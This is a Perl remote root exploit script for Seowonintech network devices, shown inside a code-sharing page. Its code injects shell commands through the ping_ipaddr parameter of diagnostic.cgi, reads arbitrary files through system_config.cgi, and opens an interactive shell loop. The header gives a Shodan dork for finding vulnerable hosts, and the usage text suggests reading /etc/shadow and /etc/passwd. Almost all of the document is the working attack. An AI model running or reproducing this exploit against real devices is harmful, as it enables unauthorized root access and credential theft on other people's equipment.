扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 | #!/usr/bin/perl # #[+] Seowonintech all device remote root exploit v2 # ===================================================== # author: | email: # Todor Donev(latin)| todor dot donev # Òîäîð Äîíåâ(cyrillic) | @googlemail.com # ===================================================== # type:| platform:| description: # remote | linux| attacker can get root # hardware | seowonintech | access on the device # ===================================================== # greetings to: # Stiliyan Angelov,Tsvetelina Emirska,all elite # colleagues and all my friends that support me. # ===================================================== # warning: # Results about 37665 possible vulnerabilities # from this exploit. # ===================================================== # shodanhq dork: # thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013 # ===================================================== # P.S. Sorry for buggy perl.. :) # 2o13 Hell yeah from Bulgaria, Sofia # #Stop Monsanto Stop Monsanto Stop Monsanto # # FREE GOTTFRID SVARTHOLM WARG FREE # GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder # who was sentenced to two years in jail by Nacka # district court, Sweden on 18.06.2013 for hacking into # computers at a company that manages data for Swedish # authorities and making illegal online money transfers. use LWP::Simple qw/$ua get/; my $host=$ARGV[0] =~ /^http:\/\// ?$ARGV[0]:'http://' . $ARGV[0]; if(not defined $ARGV[0]) { usg(); exit; } print "[+] Seowonintech all device remote root exploit\n"; $diagcheck = $host."/cgi-bin/diagnostic.cgi"; $syscheck = $host."/cgi-bin/system_config.cgi"; $res = $ua->get($diagcheck) || die "[-] Error: $!\n"; print "[+] Checking before attack..\n"; if($res->status_line != 200){ print "[+] diagnostic.cgi Status: ".$res->status_line."\n"; }else{ print "[o] Victim is ready for attack.\n"; print "[o] Status: ".$res->status_line."\n"; if(defined $res =~ m{selected>4</option>}sx){ print "[+] Connected to $ARGV[0]\n"; print "[+] The fight for the future Begins\n"; print "[+] Exploiting via remote command execution..\n"; print "[+] Permission granted, old friend.\n"; &rce; }else{ print "[!] Warning: possible vulnerability.\n"; exit; } } $res1 = $ua->get($syscheck) || die "[-] Error: $!\n"; if($res1->status_line != 200){ print "[+] system_config.cgi Status: ".$res1->status_line."\n"; exit; }else{ print "[+] Trying to attack via remote file disclosure release.\n"; if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){ print "[+] Victim is ready for attack.\n"; print "[+] Connected to $ARGV[0]\n"; print "[o] Follow the white cat.\n"; print "[+] Exploiting via remote file dislocure..\n"; print "[+] You feeling lucky, Neo?\n"; &rfd; }else{ print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n"; exit; } } sub rfd{ while(1){ print "# cat "; chomp($file=<STDIN>); if($file eq ""){ print "Enter full path to file!\n"; } $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY"; $data=get($bug) || die "[-] Error: $ARGV[0] $!\n"; $data =~ s/Null/File not found!/gs; if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){ print $1."\n"; } } } sub rce{ while(1){ print "# "; chomp($rce=<STDIN>); $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping"; $rce =~ s/\|/\;/; if($rce eq ""){print "enter Linux command\n";} if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;} $data=get($bug) || die "[-] Error: $!\n"; if (defined $data =~ m{(\s.*) Content-type:}sx){ $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms'); $result =~ s/ loss\n//; $result =~ s/ ms\n//; print $result; } } } sub usg { print " [+] Seowonintech all device remote root exploit\n"; print " [!] by Todor Donev todor dot donev @ googlemail.com\n"; print " [?] usg: perl $0 <victim>\n"; print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n"; print " [1] exmp xpl RCE: # uname -a :)\n"; print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n"; } |
体验盒子
